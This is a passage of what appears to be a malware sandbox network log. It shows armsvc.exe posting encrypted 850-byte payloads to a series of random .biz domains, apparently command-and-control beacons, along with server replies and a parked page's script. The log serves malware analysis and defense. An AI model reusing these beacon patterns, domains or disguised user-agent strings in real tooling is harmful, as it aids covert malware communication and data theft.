                                                                                                                                                                                                                            Data Ascii: <h1>przvgke.biz</h1> </div> <div class="tcHolder"> <div id="tc"></div> </div> </div> </div> <div class="footer"> 2024 Copyright. All Rights Reserved.
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772907972 CET1236INData Raw: 20 27 73 65 61 72 63 68 62 6f 78 27 2c 0a 20 20 20 20 20 20 20 20 27 66 6f 6e 74 53 69 7a 65 53 65 61 72 63 68 49 6e 70 75 74 27 3a 20 31 32 2c 0a 20 20 20 20 20 20 20 20 27 68 69 64 65 53 65 61 72 63 68 49 6e 70 75 74 42 6f 72 64 65 72 27 3a 20
                                                                                                                                                                                                                            Data Ascii: 'searchbox', 'fontSizeSearchInput': 12, 'hideSearchInputBorder': false, 'hideSearchButtonBorder': true, 'fontSizeSearchButton': 13, 'colorBackground': 'transparent', 'colorSearchButton': '#0b327
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772921085 CET1236INData Raw: 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 20 2b 20 27 26 27 20 3a 20 27 3f 27 29 20 2b 20 27 5f 78 61 66 76 72 3d 4e 7a 46 68 59 57 52 6a 59 54 59 79 4d 57 49 31 4d 7a 4e 6d 59 6a 59 31 59 57 59 33 4f 44 63 77 5a 44 6c 6c 4e 6d 59 78 4f 44 55 78
                                                                                                                                                                                                                            Data Ascii: ocation.search + '&' : '?') + '_xafvr=NzFhYWRjYTYyMWI1MzNmYjY1YWY3ODcwZDllNmYxODUxYmE5ZDQ4MCw2NzYwMjZjODg2ZmZi'; }let pageLoadedCallbackTriggered = false;let fallbackTriggered = false;let formerCalledArguments = false;let pageOptions = {'pubId
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.773150921 CET1236INData Raw: 61 64 65 64 43 61 6c 6c 62 61 63 6b 54 72 69 67 67 65 72 65 64 20 3d 20 74 72 75 65 3b 69 66 20 28 28 73 74 61 74 75 73 2e 66 61 69 6c 6c 69 73 74 65 64 20 3d 3d 3d 20 74 72 75 65 20 7c 7c 20 73 74 61 74 75 73 2e 66 61 69 6c 6c 69 73 74 65 64 20
                                                                                                                                                                                                                            Data Ascii: adedCallbackTriggered = true;if ((status.faillisted === true || status.faillisted == "true" || status.blocked === true || status.blocked == "true" ) && status.error_code != 25) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.773164034 CET1224INData Raw: 51 75 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67
                                                                                                                                                                                                                            Data Ascii: Query(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=needsreview&uid=" + encodeURIComponent(uniqueTrackingID));}if ((status.adult === true || status.adult == "true") && !isAdult) {ajaxQuery(scriptPath + "/track
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.893018961 CET1236INData Raw: 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67 67 6c 65 3d 61 6e 73 77 65
                                                                                                                                                                                                                            Data Ascii: iptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=answercheck&answer=rejected&uid=" + encodeURIComponent(uniqueTrackingID));}}};let x = function (obj1, obj2) {if (typeof obj1 != "object")obj1 = {};for (let key in obj
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.722455025 CET365OUTGET /asgidloooxieajf?usid=25&utid=8251792691 HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Host: ww12.przvgke.biz
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.206362009 CET825INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Accept-Ch: viewport-width
                                                                                                                                                                                                                            Accept-Ch: dpr
                                                                                                                                                                                                                            Accept-Ch: device-memory
                                                                                                                                                                                                                            Accept-Ch: rtt
                                                                                                                                                                                                                            Accept-Ch: downlink
                                                                                                                                                                                                                            Accept-Ch: ect
                                                                                                                                                                                                                            Accept-Ch: ua
                                                                                                                                                                                                                            Accept-Ch: ua-full-version
                                                                                                                                                                                                                            Accept-Ch: ua-platform
                                                                                                                                                                                                                            Accept-Ch: ua-platform-version
                                                                                                                                                                                                                            Accept-Ch: ua-arch
                                                                                                                                                                                                                            Accept-Ch: ua-model
                                                                                                                                                                                                                            Accept-Ch: ua-mobile
                                                                                                                                                                                                                            Accept-Ch-Lifetime: 30
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:33 GMT
                                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_FO4TwY52o3iOEwg7g/Ed+O6QQ2OtSWH62RBM20VYRJ1aoNURhvcyY36ovhRBH1YQocPzgp9gjtfkPghTjoMMVg==
                                                                                                                                                                                                                            X-Domain: przvgke.biz
                                                                                                                                                                                                                            X-Pcrew-Blocked-Reason:
                                                                                                                                                                                                                            X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                                                                            X-Subdomain: ww12
                                                                                                                                                                                                                            Transfer-Encoding: chunked


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            8192.168.2.44974118.141.10.107807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.227845907 CET353OUTPOST /sjqomgqqk HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: knjghuig.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.227868080 CET850OUTData Raw: d9 00 0a 1d 3d 03 af 64 46 03 00 00 34 94 46 ab b1 5b f0 27 19 ad ce 80 61 5b 61 a0 c4 16 0f 45 d9 b1 d7 d1 8c 03 6c 29 06 78 46 87 70 86 19 48 fc d2 b1 67 b3 5b 1c 5f 33 ef 36 72 41 1b 01 d2 f6 ee 4f 05 18 9e 89 85 33 82 08 f7 ac 59 cd b0 07 50
                                                                                                                                                                                                                            Data Ascii: =dF4F['a[aEl)xFpHg[_36rAO3YP4+y\WY?#qECHYn@PBu(DG?H?x5=I6et`fvp ;.WI85fs?WrAMzzrR9`"q{S>b?\=t(
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.233135939 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:36 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: btst=3c0c32e6a9e1694ae5cdef5c3d650d4f|8.46.123.189|1734354636|1734354636|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            9192.168.2.44974582.112.184.197807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:10:38.931471109 CET346OUTPOST /rdnh HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: lpuegx.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:10:38.931513071 CET850OUTData Raw: 61 6c da 0f 62 46 ee 2c 46 03 00 00 12 41 cf bf 5b ce 25 cf 14 18 82 dc 89 59 2a 37 19 51 39 99 d0 87 53 72 e9 fe 0f b0 35 b9 51 7a 58 5c db fc a9 cc b6 4f ae 98 ec 2c 62 e4 9b 0a c1 82 67 fd 1f 0f d2 b2 fc 70 4e 71 e1 10 82 03 50 ba 46 61 40 67
                                                                                                                                                                                                                            Data Ascii: albF,FA[%Y*7Q9Sr5QzX\O,bgpNqPFa@gZK^2+|hrHz_ib;1)kPnAv2_av!L(@4;_Oh,~]w,{2B`cO]iZ_4:Y(w%?1O_


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            10192.168.2.44974882.112.184.197807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:11:01.203083992 CET344OUTPOST /at HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: lpuegx.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:11:01.203103065 CET850OUTData Raw: 99 a7 cf 54 fb d3 97 58 46 03 00 00 fd 75 90 a0 46 f6 fa 70 0b 8a de 43 4a cb 01 9a e3 d2 e5 2b d0 c5 74 d6 22 2d 84 d2 e4 23 cb a4 e9 a8 4a 62 f0 13 d4 94 64 86 67 26 e0 a4 3b fb 05 48 63 37 30 da ba 7b ec d3 d4 ea 33 0c f7 3e 14 70 0a 04 fe a6
                                                                                                                                                                                                                            Data Ascii: TXFuFpCJ+t"-#Jbdg&;Hc70{3>pT]_,,}8vqTFIEujhvHLaH bC/ I!(.]j;q_VC9&0@WDYA8/W*v}y1odp(Y


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            11192.168.2.44976682.112.184.197807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.516927958 CET346OUTPOST /v HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: vjaxhpbji.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.516927958 CET850OUTData Raw: 8f 37 a6 94 c9 1f 6a 14 46 03 00 00 30 87 bb ea 01 d9 17 c5 1a e1 a5 02 24 88 76 29 23 07 a0 74 42 3b a4 6d f9 ec c3 67 e8 9e c8 f2 f4 9c c1 69 7d 81 70 ef 92 94 30 46 73 08 0a db 75 13 f7 da 86 ce 72 d1 7b 50 9f ab 26 c3 83 ae 30 e0 65 e4 d9 96
                                                                                                                                                                                                                            Data Ascii: 7jF0$v)#tB;mgi}p0Fsur{P&0eYxJ:%'}nWd 2~p.:RUag$~F0"Kab]&}_h5~O.(bW{OZ-Jaf"TOR*_QYFHz84Y4


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            12192.168.2.44981682.112.184.197807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.556301117 CET357OUTPOST /tcmuebmfxhuj HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: vjaxhpbji.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.556301117 CET850OUTData Raw: cb bb a3 7a 38 64 1a f7 46 03 00 00 ac 98 f9 2e 70 a9 e8 cd ca 46 5f 08 c2 3e 1c 5c cb cb d6 68 01 cb cb cf 06 83 42 1a 39 01 ef 3b cc ed 75 ad f4 aa 93 c3 48 65 aa f0 05 cd 24 75 2f 5e 50 87 36 3e 50 a4 cf b2 bf cd aa 00 6c c2 6a c1 50 9f 27 cb
                                                                                                                                                                                                                            Data Ascii: z8dF.pF_>\hB9;uHe$u/^P6>PljP's<cG$jh9pi[oZ|Hdy}RJ#0"p(aBMO*@4r(m(I!Zf$T(n/p9!_tmkN<`*k


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            13192.168.2.44986747.129.31.212807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.139326096 CET354OUTPOST /jsoiayboaqe HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: xlfhhhm.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.139336109 CET850OUTData Raw: 4a fb ea c8 23 5f 30 e0 46 03 00 00 5b 06 aa 09 11 2d 03 30 b4 5c 46 b0 5b 38 fa 23 82 74 38 67 27 23 38 e3 c0 92 61 b1 0f 27 8b e6 d4 60 ce d5 26 20 81 33 7b 34 d4 fb cf 31 02 b2 d4 24 e1 0d 24 39 e7 0f 6a 22 cb eb 80 35 67 60 ad f8 25 47 f6 67
                                                                                                                                                                                                                            Data Ascii: J#_0F[-0\F[8#t8g'#8a'`& 3{41$$9j"5g`%Gg~D";h IPy%'$.r;)}(K+mpbD6HRL;pYk>H@kQ33]6+f;h6/D1>bNWN?Z#2/"u!j=fmE?7
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.174906015 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:12:10 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: btst=ac524eaba069fbcb08dca07cef553fc7|8.46.123.189|1734354730|1734354730|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            14192.168.2.44987313.251.16.150807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.927006006 CET358OUTPOST /mmbextsivoeuyvtt HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: ifsaia.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.927031994 CET850OUTData Raw: 0f 59 cc 32 b3 45 bf 6b 46 03 00 00 75 7b 45 a2 7b 4b c2 f9 55 fd 86 e6 23 87 d4 0b dd 34 c6 04 ea 85 28 1f 71 50 eb b1 d2 ab 85 fb 32 9a 83 4b 1e 6e f3 fd dd ec 47 d5 22 55 af 89 48 5e 32 26 0c a8 91 05 bf 09 d2 5a 85 94 7d b5 03 35 12 cd ad fe
                                                                                                                                                                                                                            Data Ascii: Y2EkFu{E{KU#4(qP2KnG"UH^2&Z}54g&EP9b_.TA~%=0 U)QEV~D:U`edE>:}4X|)XTs{GDz-JhE]}v!
                                                                                                                                                                                                                            Dec 16, 2024 14:12:13.949496984 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:12:13 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: btst=c0b64c0988310ef2069abe3ebedcde93|8.46.123.189|1734354733|1734354733|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            15192.168.2.44988444.221.84.105807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.650361061 CET355OUTPOST /xoqfqirqhp HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: saytjshyf.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.650832891 CET850OUTData Raw: 3a 5f ee bd 91 3f e1 63 46 03 00 00 d0 f8 26 ca d5 e3 c3 71 d6 56 48 49 54 bd 8f 39 78 ab fa 73 38 4e 68 89 44 0e c2 4d 2c 90 7a 03 c6 e2 9d 57 bf 5e c1 25 df ee 44 46 31 5d f0 7b 3a c1 60 89 1a 1c 87 35 11 f2 c8 9c bb 2e f3 ca ca 98 ad bd 9e 09
                                                                                                                                                                                                                            Data Ascii: :_?cF&qVHIT9xs8NhDM,zW^%DF1]{:`5.q$Qj&QbaEs(sW{Z[oU>@~rcnovQjz!H\K_vE-pq!$tt)G^TFR>*cxF;=t,?H&
                                                                                                                                                                                                                            Dec 16, 2024 14:12:15.746413946 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:12:15 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: btst=67623fea5fcea3de57622807835f06a0|8.46.123.189|1734354735|1734354735|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            16192.168.2.44989018.141.10.107807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.686177969 CET358OUTPOST /kknpblsbxdrrjko HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: vcddkls.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.686197996 CET850OUTData Raw: 6e 44 5f 2a a6 0e ee ee 46 03 00 00 48 e1 0b e6 f1 eb 7b 06 61 68 40 9b ca 87 ff c9 c1 dd 41 7b 35 39 35 fa c8 61 6b e2 a2 fa 6a f2 f9 d5 65 9a 10 ae 56 54 7e d4 77 84 4a a3 54 68 44 56 00 76 14 e8 83 1c 8f 81 e5 e8 75 e7 4b 25 53 dd 3d ab bc 07
                                                                                                                                                                                                                            Data Ascii: nD_*FH{ah@A{595akjeVT~wJThDVvuK%S=k,VZZkca#%T+Yu)HF!kU*zD"C0+g:7@9zck7K\G6+*2F`[;eGNG&JLK`_6*5<!gbZkSJsV
                                                                                                                                                                                                                            Dec 16, 2024 14:12:18.691659927 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:12:18 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: btst=4e1dd1867094bd560cc0255fb6bacab1|8.46.123.189|1734354738|1734354738|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            17192.168.2.449896172.234.222.143807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.347909927 CET348OUTPOST /wxalwqn HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: fwiwk.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.347909927 CET850OUTData Raw: 67 9c 01 f5 22 30 36 c3 46 03 00 00 23 46 8c e7 fc fb ba 5f 70 fd e6 e4 a9 1d 2a db 2d 8d 2b b8 37 41 97 89 21 93 54 83 45 56 ec 8a 5e b0 17 c0 25 a6 5b 58 f5 0a e6 7c 1d 7f 4b 96 d0 b2 85 ae f7 7f e7 e4 38 04 b8 38 2d 79 2b b8 e4 75 a3 3c 7c 74
                                                                                                                                                                                                                            Data Ascii: g"06F#F_p*-+7A!TEV^%[X|K88-y+u<|t&m3QspQJm{8~}%fbqbgJjhfvaqDXhVLK'_Q/#G|hB<D}VjO|?p?w4$r_ngW:
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.488104105 CET467INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:12:20 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                                            Location: http://ww99.fwiwk.biz/wxalwqn
                                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            18192.168.2.44989772.52.179.174807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.837055922 CET331OUTGET /wxalwqn HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
